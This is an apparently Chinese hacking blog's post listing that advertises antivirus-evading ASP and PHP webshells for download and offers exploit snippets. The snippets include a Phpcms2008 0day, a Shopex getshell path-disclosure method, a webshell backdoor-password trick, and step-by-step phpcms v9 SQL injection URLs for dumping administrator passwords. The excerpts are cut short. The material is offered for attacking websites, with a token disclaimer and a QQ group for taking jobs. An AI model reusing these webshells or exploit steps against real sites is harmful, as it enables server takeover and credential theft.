火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

Mumaasp.com 发布解密版超级免杀php大马!

2012-10-06

超级PHP大马解密版,拒绝后门! 本款PHP木马功能非常强大,请务用于非法用途! 密码  mumaasp.com

登录界面如下:

 

功能非常强大,解密无后门!

超强的代理功能 你懂的

 

解密版,拒绝加密后门!

 

下载地址:超级免杀PHP大马解密版

 

Phpcms2008漏洞0day和EXP

2012-10-06

漏洞存在于yp/job.php的17-34行,urldecode函数惹的祸,代码如下: ========================================================== switch($action) { case ‘list’: $catid = intval($catid); $head['keywords'] .= ‘职位列表’; $head['title'] .= ‘职位列表’.'_’.$PHPCMS['sitename']; $head['description'] .= ‘职位列表’.'_’.$PHPCMS['sitename']; $templ……

Read more

Shopex前台普通用户getshell最新漏洞

2012-10-04

利用方法:

第一个:想办法找到目标网站的绝对路径

 

http://www.mumaasp.com/install/svinfo.php?phpinfo=true

http://www.mumaasp.com/core/api/shop_api.php

http://www.mumaasp.com/core/api/site/2.0/api_b2b_2_0_cat.php

http://www.mumaasp.com/core/api/site/2.0/api_b2b_2_0_goodstype.php

http://www.mumaasp.com/c……

Read more

草泥马、紫云残雪等等Asp木马后门之——爆出密码

2012-10-03

Asp木马登录界面跟这个类似的都可以尝试以下后门

if session(“KKK”)<>UserPass then ‘Asp木马密码验证无问题
if request.form(“pass”)<>”" then
if request.form(“pass”)=UserPass then
session(“KKK”)=UserPass
response.redirect url
else ‘关键在这
j”<br><br><br><b><div align=center><font size=……

Read more

phpcms v9最新版爆库漏洞 爆出管理员帐号密码!

2012-10-03

第一步:注册一个用户

http://www.mumaasp.com/index.php?m=member&c=index&a=register&siteid=1

第二步:访问api文件,爆出表前缀,默认的表前缀为v9

http://www.mumaasp.com/api.php?op=add_favorite&url=wooyun.in&title=%2527

第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)

http://www.mumaasp.com/api.php?op=add_favorite&url=v9&title=%2527%25……

Read more